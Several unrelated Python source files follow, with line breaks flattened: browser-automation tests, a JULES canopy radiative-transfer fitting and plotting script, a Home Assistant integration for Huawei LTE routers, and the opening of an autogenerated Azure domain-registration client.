action_runner.EvaluateJavaScript('valueToTest')) def WillFail(): action_runner.ClickElement('#notfound') self.assertRaises(exceptions.EvaluateException, WillFail) @benchmark.Disabled('debug') def testTapElement(self): self.Navigate('page_with_clickables.html') action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) action_runner.ExecuteJavaScript('valueSettableByTest = 1;') action_runner.TapElement('#test') self.assertEqual(1, action_runner.EvaluateJavaScript('valueToTest')) action_runner.ExecuteJavaScript('valueSettableByTest = 2;') action_runner.TapElement(text='Click/tap me') self.assertEqual(2, action_runner.EvaluateJavaScript('valueToTest')) action_runner.ExecuteJavaScript('valueSettableByTest = 3;') action_runner.TapElement( element_function='document.body.firstElementChild') self.assertEqual(3, action_runner.EvaluateJavaScript('valueToTest')) def WillFail(): action_runner.TapElement('#notfound') self.assertRaises(exceptions.EvaluateException, WillFail) def testScroll(self): if not page_action.IsGestureSourceTypeSupported( self._tab, 'touch'): return self.Navigate('page_with_swipeables.html') action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) action_runner.ScrollElement( selector='#left-right', direction='right', left_start_ratio=0.9) self.assertTrue(action_runner.EvaluateJavaScript( 'document.querySelector("#left-right").scrollLeft') > 75) action_runner.ScrollElement( selector='#top-bottom', direction='down', top_start_ratio=0.9) self.assertTrue(action_runner.EvaluateJavaScript( 'document.querySelector("#top-bottom").scrollTop') > 75) action_runner.ScrollPage(direction='right', left_start_ratio=0.9, distance=100) self.assertTrue(action_runner.EvaluateJavaScript( 'document.body.scrollLeft') > 75) def testSwipe(self): if not page_action.IsGestureSourceTypeSupported( self._tab, 'touch'): return self.Navigate('page_with_swipeables.html') action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) action_runner.SwipeElement( selector='#left-right', direction='left', left_start_ratio=0.9) self.assertTrue(action_runner.EvaluateJavaScript( 'document.querySelector("#left-right").scrollLeft') > 75) action_runner.SwipeElement( selector='#top-bottom', direction='up', top_start_ratio=0.9) self.assertTrue(action_runner.EvaluateJavaScript( 'document.querySelector("#top-bottom").scrollTop') > 75) action_runner.SwipePage(direction='left', left_start_ratio=0.9) self.assertTrue(action_runner.EvaluateJavaScript( 'document.body.scrollLeft') > 75)
from library_rami4pilps import * #from foo1 import * from RAMI4PILPS_reference_values import * from invertJulesRT_new import * from copy import copy from array import array from pylab import * from runJulesRTStruct import runJulesRTStruct import numpy as np import matplotlib.pyplot as plt controlData=[] # Sparse canopy #Absorbed PAR controlData.append(OFC_FABS_PAR_050_BLK_27) controlData.append(OFC_FABS_PAR_050_BLK_60) controlData.append(OFC_FABS_PAR_050_BLK_83) controlData.append(OFC_FABS_PAR_050_BLK_99) controlData.append(OFC_FABS_PAR_050_MED_27) controlData.append(OFC_FABS_PAR_050_MED_60) controlData.append(OFC_FABS_PAR_050_MED_83) controlData.append(OFC_FABS_PAR_050_MED_99) controlData.append(OFC_FABS_PAR_050_SNW_27) controlData.append(OFC_FABS_PAR_050_SNW_60) controlData.append(OFC_FABS_PAR_050_SNW_83) controlData.append(OFC_FABS_PAR_050_SNW_99) #Reflected PAR controlData.append(OFC_FREF_PAR_050_BLK_27) controlData.append(OFC_FREF_PAR_050_BLK_60) controlData.append(OFC_FREF_PAR_050_BLK_83) controlData.append(OFC_FREF_PAR_050_BLK_99) controlData.append(OFC_FREF_PAR_050_MED_27) controlData.append(OFC_FREF_PAR_050_MED_60) controlData.append(OFC_FREF_PAR_050_MED_83) controlData.append(OFC_FREF_PAR_050_MED_99) controlData.append(OFC_FREF_PAR_050_SNW_27) controlData.append(OFC_FREF_PAR_050_SNW_60) controlData.append(OFC_FREF_PAR_050_SNW_83) controlData.append(OFC_FREF_PAR_050_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_050_BLK_27) #controlData.append(OFC_FABS_NIR_050_BLK_60) #controlData.append(OFC_FABS_NIR_050_BLK_83) #controlData.append(OFC_FABS_NIR_050_BLK_99) #controlData.append(OFC_FABS_NIR_050_MED_27) #controlData.append(OFC_FABS_NIR_050_MED_60) #controlData.append(OFC_FABS_NIR_050_MED_83) #controlData.append(OFC_FABS_NIR_050_MED_99) #controlData.append(OFC_FABS_NIR_050_SNW_27) #controlData.append(OFC_FABS_NIR_050_SNW_60) #controlData.append(OFC_FABS_NIR_050_SNW_83) #controlData.append(OFC_FABS_NIR_050_SNW_99) #Reflected NIR #controlData.append(OFC_FREF_NIR_050_BLK_27) #controlData.append(OFC_FREF_NIR_050_BLK_60) #controlData.append(OFC_FREF_NIR_050_BLK_83) #controlData.append(OFC_FREF_NIR_050_BLK_99) #controlData.append(OFC_FREF_NIR_050_MED_27) #controlData.append(OFC_FREF_NIR_050_MED_60) #controlData.append(OFC_FREF_NIR_050_MED_83) #controlData.append(OFC_FREF_NIR_050_MED_99) #controlData.append(OFC_FREF_NIR_050_SNW_27) #controlData.append(OFC_FREF_NIR_050_SNW_60) #controlData.append(OFC_FREF_NIR_050_SNW_83) #controlData.append(OFC_FREF_NIR_050_SNW_99) #Medium canopy #Absorbed PAR #controlData.append(OFC_FABS_PAR_150_BLK_27) #controlData.append(OFC_FABS_PAR_150_BLK_60) #controlData.append(OFC_FABS_PAR_150_BLK_83) #controlData.append(OFC_FABS_PAR_150_BLK_99) #controlData.append(OFC_FABS_PAR_150_MED_27) #controlData.append(OFC_FABS_PAR_150_MED_60) #controlData.append(OFC_FABS_PAR_150_MED_83) #controlData.append(OFC_FABS_PAR_150_MED_99) #controlData.append(OFC_FABS_PAR_150_SNW_27) #controlData.append(OFC_FABS_PAR_150_SNW_60) #controlData.append(OFC_FABS_PAR_150_SNW_83) #controlData.append(OFC_FABS_PAR_150_SNW_99) #Reflected PAR #controlData.append(OFC_FREF_PAR_150_BLK_27) #controlData.append(OFC_FREF_PAR_150_BLK_60) #controlData.append(OFC_FREF_PAR_150_BLK_83) #controlData.append(OFC_FREF_PAR_150_BLK_99) #controlData.append(OFC_FREF_PAR_150_MED_27) #controlData.append(OFC_FREF_PAR_150_MED_60) #controlData.append(OFC_FREF_PAR_150_MED_83) #controlData.append(OFC_FREF_PAR_150_MED_99) #controlData.append(OFC_FREF_PAR_150_SNW_27) #controlData.append(OFC_FREF_PAR_150_SNW_60) #controlData.append(OFC_FREF_PAR_150_SNW_83) #controlData.append(OFC_FREF_PAR_150_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_150_BLK_27) #controlData.append(OFC_FABS_NIR_150_BLK_60) #controlData.append(OFC_FABS_NIR_150_BLK_83) #controlData.append(OFC_FABS_NIR_150_BLK_99) #controlData.append(OFC_FABS_NIR_150_MED_27) #controlData.append(OFC_FABS_NIR_150_MED_60) #controlData.append(OFC_FABS_NIR_150_MED_83) #controlData.append(OFC_FABS_NIR_150_MED_99) #controlData.append(OFC_FABS_NIR_150_SNW_27) #controlData.append(OFC_FABS_NIR_150_SNW_60) #controlData.append(OFC_FABS_NIR_150_SNW_83) #controlData.append(OFC_FABS_NIR_150_SNW_99) #Reflected NIR #controlData.append(OFC_FREF_NIR_150_BLK_27) #controlData.append(OFC_FREF_NIR_150_BLK_60) #controlData.append(OFC_FREF_NIR_150_BLK_83) #controlData.append(OFC_FREF_NIR_150_BLK_99) #controlData.append(OFC_FREF_NIR_150_MED_27) #controlData.append(OFC_FREF_NIR_150_MED_60) #controlData.append(OFC_FREF_NIR_150_MED_83) #controlData.append(OFC_FREF_NIR_150_MED_99) #controlData.append(OFC_FREF_NIR_150_SNW_27) #controlData.append(OFC_FREF_NIR_150_SNW_60) #controlData.append(OFC_FREF_NIR_150_SNW_83) #controlData.append(OFC_FREF_NIR_150_SNW_99) #Dense canopy #Absorbed PAR #controlData.append(OFC_FABS_PAR_250_BLK_27) #controlData.append(OFC_FABS_PAR_250_BLK_60) #controlData.append(OFC_FABS_PAR_250_BLK_83) #controlData.append(OFC_FABS_PAR_250_BLK_99) #controlData.append(OFC_FABS_PAR_250_MED_27) #controlData.append(OFC_FABS_PAR_250_MED_60) #controlData.append(OFC_FABS_PAR_250_MED_83) #controlData.append(OFC_FABS_PAR_250_MED_99) #controlData.append(OFC_FABS_PAR_250_SNW_27) #controlData.append(OFC_FABS_PAR_250_SNW_60) #controlData.append(OFC_FABS_PAR_250_SNW_83) #controlData.append(OFC_FABS_PAR_250_SNW_99) #Reflected PAR #controlData.append(OFC_FREF_PAR_250_BLK_27) #controlData.append(OFC_FREF_PAR_250_BLK_60) #controlData.append(OFC_FREF_PAR_250_BLK_83) #controlData.append(OFC_FREF_PAR_250_BLK_99) #controlData.append(OFC_FREF_PAR_250_MED_27) #controlData.append(OFC_FREF_PAR_250_MED_60) #controlData.append(OFC_FREF_PAR_250_MED_83) #controlData.append(OFC_FREF_PAR_250_MED_99) #controlData.append(OFC_FREF_PAR_250_SNW_27) #controlData.append(OFC_FREF_PAR_250_SNW_60) #controlData.append(OFC_FREF_PAR_250_SNW_83) #controlData.append(OFC_FREF_PAR_250_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_250_BLK_27) #controlData.append(OFC_FABS_NIR_250_BLK_60) #controlData.append(OFC_FABS_NIR_250_BLK_83) #controlData.append(OFC_FABS_NIR_250_BLK_99) #controlData.append(OFC_FABS_NIR_250_MED_27) #controlData.append(OFC_FABS_NIR_250_MED_60) #controlData.append(OFC_FABS_NIR_250_MED_83) #controlData.append(OFC_FABS_NIR_250_MED_99) #controlData.append(OFC_FABS_NIR_250_SNW_27) #controlData.append(OFC_FABS_NIR_250_SNW_60) #controlData.append(OFC_FABS_NIR_250_SNW_83) #controlData.append(OFC_FABS_NIR_250_SNW_99) #Reflected NIR #controlData.append(OFC_FREF_NIR_250_BLK_27) #controlData.append(OFC_FREF_NIR_250_BLK_60) #controlData.append(OFC_FREF_NIR_250_BLK_83) #controlData.append(OFC_FREF_NIR_250_BLK_99) #controlData.append(OFC_FREF_NIR_250_MED_27) #controlData.append(OFC_FREF_NIR_250_MED_60) #controlData.append(OFC_FREF_NIR_250_MED_83) #controlData.append(OFC_FREF_NIR_250_MED_99) #controlData.append(OFC_FREF_NIR_250_SNW_27) #controlData.append(OFC_FREF_NIR_250_SNW_60) #controlData.append(OFC_FREF_NIR_250_SNW_83) #controlData.append(OFC_FREF_NIR_250_SNW_99) [a,b]=solveJulesStruct(controlData,initParams=np.array([1.0,0.0])) [a,b]=solveJulesStruct(controlData,[a,b]) x = [] jules_str = [] jules_ori = [] #type here your own structure factor parameters #[a,b]=[0.34346912,0.09578224] print a,b for sza in range (0,90): x.append(sza),jules_str.append(runJulesRTStruct(sza=sza,astruc=a,bstruc=b,lai=0.50265, soilR=0.9640, leafR=0.0735, leafT=0.0566, diffuse=False, uniform=True)),jules_ori.append(runJulesRTStruct(sza=sza,astruc=1.0,bstruc=0.0,lai=0.50265, soilR=0.9640, leafR=0.0735, leafT=0.0566, diffuse=False, uniform=True)) #print x #print y fapar_str = tuple(x[0] for x in jules_str) albedo_str = tuple(x[1] for x in jules_str) fapar_ori = tuple(x[0] for x in jules_ori) albedo_ori = tuple(x[1] for x in jules_ori) forwardModel=copy(controlData) #addTwinObs(forwardModel,astruc=a,bstruc=b) #figure title('Nonsense') xlabel('x-stuff') ylabel('y-stuff') plt.grid() plt.legend() # the scatter plot: axScatter = plt.subplot(111) axScatter.scatter(x, albedo_ori,label='Two-stream') # set axes range plt.xlim(0, 90) plt.ylim(0, 1) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_BLK, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_MED, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_SNW, color='Y', marker='x', s=300) plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fref_PAR_OFC_050_SNW, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_BLK, color='R', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_MED, color='R', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_SNW, color='R', marker='x', s=300) plt.scatter(x, albedo_str, alpha=0.5,label='Structure') plt.show()
"""Support for Huawei LTE routers.""" from collections import defaultdict from datetime import timedelta from functools import partial import ipaddress import logging from typing import Any, Callable, Dict, List, Set, Tuple from urllib.parse import urlparse import attr from getmac import get_mac_address from huawei_lte_api.AuthorizedConnection import AuthorizedConnection from huawei_lte_api.Client import Client from huawei_lte_api.Connection import Connection from huawei_lte_api.exceptions import ( ResponseErrorLoginRequiredException, ResponseErrorNotSupportedException, ) from requests.exceptions import Timeout from url_normalize import url_normalize import voluptuous as vol from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN from homeassistant.components.device_tracker import DOMAIN as DEVICE_TRACKER_DOMAIN from homeassistant.components.notify import DOMAIN as NOTIFY_DOMAIN from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry from homeassistant.const import ( CONF_NAME, CONF_PASSWORD, CONF_RECIPIENT, CONF_URL, CONF_USERNAME, EVENT_HOMEASSISTANT_STOP, ) from homeassistant.core import CALLBACK_TYPE from homeassistant.exceptions import ConfigEntryNotReady from homeassistant.helpers import ( config_validation as cv, device_registry as dr, discovery, ) from homeassistant.helpers.dispatcher import ( async_dispatcher_connect, async_dispatcher_send, dispatcher_send, ) from homeassistant.helpers.entity import Entity from homeassistant.helpers.event import async_track_time_interval from homeassistant.helpers.typing import HomeAssistantType from .const import ( ADMIN_SERVICES, ALL_KEYS, CONNECTION_TIMEOUT, DEFAULT_DEVICE_NAME, DEFAULT_NOTIFY_SERVICE_NAME, DOMAIN, KEY_DEVICE_BASIC_INFORMATION, KEY_DEVICE_INFORMATION, KEY_DEVICE_SIGNAL, KEY_DIALUP_MOBILE_DATASWITCH, KEY_MONITORING_STATUS, KEY_MONITORING_TRAFFIC_STATISTICS, KEY_WLAN_HOST_LIST, SERVICE_CLEAR_TRAFFIC_STATISTICS, SERVICE_REBOOT, SERVICE_RESUME_INTEGRATION, SERVICE_SUSPEND_INTEGRATION, UPDATE_OPTIONS_SIGNAL, UPDATE_SIGNAL, ) _LOGGER = logging.getLogger(__name__) # dicttoxml (used by huawei-lte-api) has uselessly verbose INFO level. # https://github.com/quandyfactory/dicttoxml/issues/60 logging.getLogger("dicttoxml").setLevel(logging.WARNING) DEFAULT_NAME_TEMPLATE = "Huawei {} {}" SCAN_INTERVAL = timedelta(seconds=10) NOTIFY_SCHEMA = vol.Any( None, vol.Schema( { vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_RECIPIENT): vol.Any( None, vol.All(cv.ensure_list, [cv.string]) ), } ), ) CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.All( cv.ensure_list, [ vol.Schema( { vol.Required(CONF_URL): cv.url, vol.Optional(CONF_USERNAME): cv.string, vol.Optional(CONF_PASSWORD): cv.string, vol.Optional(NOTIFY_DOMAIN): NOTIFY_SCHEMA, } ) ], ) }, extra=vol.ALLOW_EXTRA, ) SERVICE_SCHEMA = vol.Schema({vol.Optional(CONF_URL): cv.url}) CONFIG_ENTRY_PLATFORMS = ( BINARY_SENSOR_DOMAIN, DEVICE_TRACKER_DOMAIN, SENSOR_DOMAIN, SWITCH_DOMAIN, ) @attr.s class Router: """Class for router state.""" connection: Connection = attr.ib() url: str = attr.ib() mac: str = attr.ib() signal_update: CALLBACK_TYPE = attr.ib() data: Dict[str, Any] = attr.ib(init=False, factory=dict) subscriptions: Dict[str, Set[str]] = attr.ib( init=False, factory=lambda: defaultdict(set, ((x, {"initial_scan"}) for x in ALL_KEYS)), ) unload_handlers: List[CALLBACK_TYPE] = attr.ib(init=False, factory=list) client: Client suspended = attr.ib(init=False, default=False) def __attrs_post_init__(self): """Set up internal state on init.""" self.client = Client(self.connection) @property def device_name(self) -> str: """Get router device name.""" for key, item in ( (KEY_DEVICE_BASIC_INFORMATION, "devicename"), (KEY_DEVICE_INFORMATION, "DeviceName"), ): try: return self.data[key][item] except (KeyError, TypeError): pass return DEFAULT_DEVICE_NAME @property def device_connections(self) -> Set[Tuple[str, str]]: """Get router connections for device registry.""" return {(dr.CONNECTION_NETWORK_MAC, self.mac)} if self.mac else set() def _get_data(self, key: str, func: Callable[[None], Any]) -> None: if not self.subscriptions.get(key): return _LOGGER.debug("Getting %s for subscribers %s", key, self.subscriptions[key]) try: self.data[key] = func() except ResponseErrorNotSupportedException: _LOGGER.info( "%s not supported by device, excluding from future updates", key ) self.subscriptions.pop(key) except ResponseErrorLoginRequiredException: if isinstance(self.connection, AuthorizedConnection): _LOGGER.debug("Trying to authorize again...") if self.connection.enforce_authorized_connection(): _LOGGER.debug( "...success, %s will be updated by a future periodic run", key, ) else: _LOGGER.debug("...failed") return _LOGGER.info( "%s requires authorization, excluding from future updates", key ) self.subscriptions.pop(key) finally: _LOGGER.debug("%s=%s", key, self.data.get(key)) def update(self) -> None: """Update router data.""" if self.suspended: _LOGGER.debug("Integration suspended, not updating data") return self._get_data(KEY_DEVICE_INFORMATION, self.client.device.information) if self.data.get(KEY_DEVICE_INFORMATION): # Full information includes everything in basic self.subscriptions.pop(KEY_DEVICE_BASIC_INFORMATION, None) self._get_data( KEY_DEVICE_BASIC_INFORMATION, self.client.device.basic_information ) self._get_data(KEY_DEVICE_SIGNAL, self.client.device.signal) self._get_data( KEY_DIALUP_MOBILE_DATASWITCH, self.client.dial_up.mobile_dataswitch ) self._get_data(KEY_MONITORING_STATUS, self.client.monitoring.status) self._get_data( KEY_MONITORING_TRAFFIC_STATISTICS, self.client.monitoring.traffic_statistics ) self._get_data(KEY_WLAN_HOST_LIST, self.client.wlan.host_list) self.signal_update() def logout(self) -> None: """Log out router session.""" if not isinstance(self.connection, AuthorizedConnection): return try: self.client.user.logout() except ResponseErrorNotSupportedException: _LOGGER.debug("Logout not supported by device", exc_info=True) except ResponseErrorLoginRequiredException: _LOGGER.debug("Logout not supported when not logged in", exc_info=True) except Exception: # pylint: disable=broad-except _LOGGER.warning("Logout error", exc_info=True) def cleanup(self, *_) -> None: """Clean up resources.""" self.subscriptions.clear() for handler in self.unload_handlers: handler() self.unload_handlers.clear() self.logout() @attr.s class HuaweiLteData: """Shared state.""" hass_config: dict = attr.ib() # Our YAML config, keyed by router URL config: Dict[str, Dict[str, Any]] = attr.ib() routers: Dict[str, Router] = attr.ib(init=False, factory=dict) async def async_setup_entry(hass: HomeAssistantType, config_entry: ConfigEntry) -> bool: """Set up Huawei LTE component from config entry.""" url = config_entry.data[CONF_URL] # Override settings from YAML config, but only if they're changed in it # Old values are stored as *_from_yaml in the config entry yaml_config = hass.data[DOMAIN].config.get(url) if yaml_config: # Config values new_data = {} for key in CONF_USERNAME, CONF_PASSWORD: if key in yaml_config: value = yaml_config[key] if value != config_entry.data.get(f"{key}_from_yaml"): new_data[f"{key}_from_yaml"] = value new_data[key] = value # Options new_options = {} yaml_recipient = yaml_config.get(NOTIFY_DOMAIN, {}).get(CONF_RECIPIENT) if yaml_recipient is not None and yaml_recipient != config_entry.options.get( f"{CONF_RECIPIENT}_from_yaml" ): new_options[f"{CONF_RECIPIENT}_from_yaml"] = yaml_recipient new_options[CONF_RECIPIENT] = yaml_recipient yaml_notify_name = yaml_config.get(NOTIFY_DOMAIN, {}).get(CONF_NAME) if ( yaml_notify_name is not None and yaml_notify_name != config_entry.options.get(f"{CONF_NAME}_from_yaml") ): new_options[f"{CONF_NAME}_from_yaml"] = yaml_notify_name new_options[CONF_NAME] = yaml_notify_name # Update entry if overrides were found if new_data or new_options: hass.config_entries.async_update_entry( config_entry, data={**config_entry.data, **new_data}, options={**config_entry.options, **new_options}, ) # Get MAC address for use in unique ids. Being able to use something # from the API would be nice, but all of that seems to be available only # through authenticated calls (e.g. device_information.SerialNumber), and # we want this available and the same when unauthenticated too. host = urlparse(url).hostname try: if ipaddress.ip_address(host).version == 6: mode = "ip6" else: mode = "ip" except ValueError: mode = "hostname" mac = await hass.async_add_executor_job(partial(get_mac_address, **{mode: host})) def get_connection() -> Connection: """ Set up a connection. Authorized one if username/pass specified (even if empty), unauthorized one otherwise. """ username = config_entry.data.get(CONF_USERNAME) password = config_entry.data.get(CONF_PASSWORD) if username or password: connection = AuthorizedConnection( url, username=username, password=password, timeout=CONNECTION_TIMEOUT ) else: connection = Connection(url, timeout=CONNECTION_TIMEOUT) return connection def signal_update() -> None: """Signal updates to data.""" dispatcher_send(hass, UPDATE_SIGNAL, url) try: connection = await hass.async_add_executor_job(get_connection) except Timeout as ex: raise ConfigEntryNotReady from ex # Set up router and store reference to it router = Router(connection, url, mac, signal_update) hass.data[DOMAIN].routers[url] = router # Do initial data update await hass.async_add_executor_job(router.update) # Clear all subscriptions, enabled entities will push back theirs router.subscriptions.clear() # Set up device registry device_data = {} sw_version = None if router.data.get(KEY_DEVICE_INFORMATION): device_info = router.data[KEY_DEVICE_INFORMATION] serial_number = device_info.get("SerialNumber") if serial_number: device_data["identifiers"] = {(DOMAIN, serial_number)} sw_version = device_info.get("SoftwareVersion") if device_info.get("DeviceName"): device_data["model"] = device_info["DeviceName"] if not sw_version and router.data.get(KEY_DEVICE_BASIC_INFORMATION): sw_version = router.data[KEY_DEVICE_BASIC_INFORMATION].get("SoftwareVersion") if sw_version: device_data["sw_version"] = sw_version device_registry = await dr.async_get_registry(hass) device_registry.async_get_or_create( config_entry_id=config_entry.entry_id, connections=router.device_connections, name=router.device_name, manufacturer="Huawei", **device_data, ) # Forward config entry setup to platforms for domain in CONFIG_ENTRY_PLATFORMS: hass.async_create_task( hass.config_entries.async_forward_entry_setup(config_entry, domain) ) # Notify doesn't support config entry setup yet, load with discovery for now await discovery.async_load_platform( hass, NOTIFY_DOMAIN, DOMAIN, { CONF_URL: url, CONF_NAME: config_entry.options.get(CONF_NAME, DEFAULT_NOTIFY_SERVICE_NAME), CONF_RECIPIENT: config_entry.options.get(CONF_RECIPIENT), }, hass.data[DOMAIN].hass_config, ) # Add config entry options update listener router.unload_handlers.append( config_entry.add_update_listener(async_signal_options_update) ) def _update_router(*_: Any) -> None: """ Update router data. Separate passthrough function because lambdas don't work with track_time_interval. """ router.update() # Set up periodic update router.unload_handlers.append( async_track_time_interval(hass, _update_router, SCAN_INTERVAL) ) # Clean up at end hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, router.cleanup) return True async def async_unload_entry( hass: HomeAssistantType, config_entry: ConfigEntry ) -> bool: """Unload config entry.""" # Forward config entry unload to platforms for domain in CONFIG_ENTRY_PLATFORMS: await hass.config_entries.async_forward_entry_unload(config_entry, domain) # Forget about the router and invoke its cleanup router = hass.data[DOMAIN].routers.pop(config_entry.data[CONF_URL]) await hass.async_add_executor_job(router.cleanup) return True async def async_setup(hass: HomeAssistantType, config) -> bool: """Set up Huawei LTE component.""" # Arrange our YAML config to dict with normalized URLs as keys domain_config = {} if DOMAIN not in hass.data: hass.data[DOMAIN] = HuaweiLteData(hass_config=config, config=domain_config) for router_config in config.get(DOMAIN, []): domain_config[url_normalize(router_config.pop(CONF_URL))] = router_config def service_handler(service) -> None: """Apply a service.""" url = service.data.get(CONF_URL) routers = hass.data[DOMAIN].routers if url: router = routers.get(url) elif not routers: _LOGGER.error("%s: no routers configured", service.service) return elif len(routers) == 1: router = next(iter(routers.values())) else: _LOGGER.error( "%s: more than one router configured, must specify one of URLs %s", service.service, sorted(routers), ) return if not router: _LOGGER.error("%s: router %s unavailable", service.service, url) return if service.service == SERVICE_CLEAR_TRAFFIC_STATISTICS: if router.suspended: _LOGGER.debug("%s: ignored, integration suspended", service.service) return result = router.client.monitoring.set_clear_traffic() _LOGGER.debug("%s: %s", service.service, result) elif service.service == SERVICE_REBOOT: if router.suspended: _LOGGER.debug("%s: ignored, integration suspended", service.service) return result = router.client.device.reboot() _LOGGER.debug("%s: %s", service.service, result) elif service.service == SERVICE_RESUME_INTEGRATION: # Login will be handled automatically on demand router.suspended = False _LOGGER.debug("%s: %s", service.service, "done") elif service.service == SERVICE_SUSPEND_INTEGRATION: router.logout() router.suspended = True _LOGGER.debug("%s: %s", service.service, "done") else: _LOGGER.error("%s: unsupported service", service.service) for service in ADMIN_SERVICES: hass.helpers.service.async_register_admin_service( DOMAIN, service, service_handler, schema=SERVICE_SCHEMA, ) for url, router_config in domain_config.items(): hass.async_create_task( hass.config_entries.flow.async_init( DOMAIN, context={"source": SOURCE_IMPORT}, data={ CONF_URL: url, CONF_USERNAME: router_config.get(CONF_USERNAME), CONF_PASSWORD: router_config.get(CONF_PASSWORD), }, ) ) return True async def async_signal_options_update( hass: HomeAssistantType, config_entry: ConfigEntry ) -> None: """Handle config entry options update.""" async_dispatcher_send(hass, UPDATE_OPTIONS_SIGNAL, config_entry) async def async_migrate_entry(hass: HomeAssistantType, config_entry: ConfigEntry): """Migrate config entry to new version.""" if config_entry.version == 1: options = config_entry.options recipient = options[CONF_RECIPIENT] if isinstance(recipient, str): options[CONF_RECIPIENT] = [x.strip() for x in recipient.split(",")] config_entry.version = 2 hass.config_entries.async_update_entry(config_entry, options=options) _LOGGER.info("Migrated config entry to version %d", config_entry.version) return True @attr.s class HuaweiLteBaseEntity(Entity): """Huawei LTE entity base class.""" router: Router = attr.ib() _available: bool = attr.ib(init=False, default=True) _unsub_handlers: List[Callable] = attr.ib(init=False, factory=list) @property def _entity_name(self) -> str: raise NotImplementedError @property def _device_unique_id(self) -> str: """Return unique ID for entity within a router.""" raise NotImplementedError @property def unique_id(self) -> str: """Return unique ID for entity.""" return f"{self.router.mac}-{self._device_unique_id}" @property def name(self) -> str: """Return entity name.""" return DEFAULT_NAME_TEMPLATE.format(self.router.device_name, self._entity_name) @property def available(self) -> bool: """Return whether the entity is available.""" return self._available @property def should_poll(self) -> bool: """Huawei LTE entities report their state without polling.""" return False @property def device_info(self) -> Dict[str, Any]: """Get info for matching with parent router.""" return {"connections": self.router.device_connections} async def async_update(self) -> None: """Update state.""" raise NotImplementedError async def async_update_options(self, config_entry: ConfigEntry) -> None: """Update config entry options.""" pass async def async_added_to_hass(self) -> None: """Connect to update signals.""" self._unsub_handlers.append( async_dispatcher_connect(self.hass, UPDATE_SIGNAL, self._async_maybe_update) ) self._unsub_handlers.append( async_dispatcher_connect( self.hass, UPDATE_OPTIONS_SIGNAL, self._async_maybe_update_options ) ) async def _async_maybe_update(self, url: str) -> None: """Update state if the update signal comes from our router.""" if url == self.router.url: self.async_schedule_update_ha_state(True) async def _async_maybe_update_options(self, config_entry: ConfigEntry) -> None: """Update options if the update signal comes from our router.""" if config_entry.data[CONF_URL] == self.router.url: await self.async_update_options(config_entry) async def async_will_remove_from_hass(self) -> None: """Invoke unsubscription handlers.""" for unsub in self._unsub_handlers: unsub() self._unsub_handlers.clear()
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar import warnings from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.mgmt.core.exceptions import ARMErrorFormat from msrest import Serializer from .. import models as _models from .._vendor import _convert_request, _format_url_section T = TypeVar('T') JSONType = Any ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False def build_list_request( subscription_id: str, **kwargs: Any ) -> HttpRequest: api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains') path_format_arguments = { "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_get_request( name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_list_agreements_request( name: str, subscription_id: str, *, json: JSONType = None, content: Any = None, **kwargs: Any ) -> HttpRequest: content_type = kwargs.pop('content_type', None) # type: Optional[str] api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", 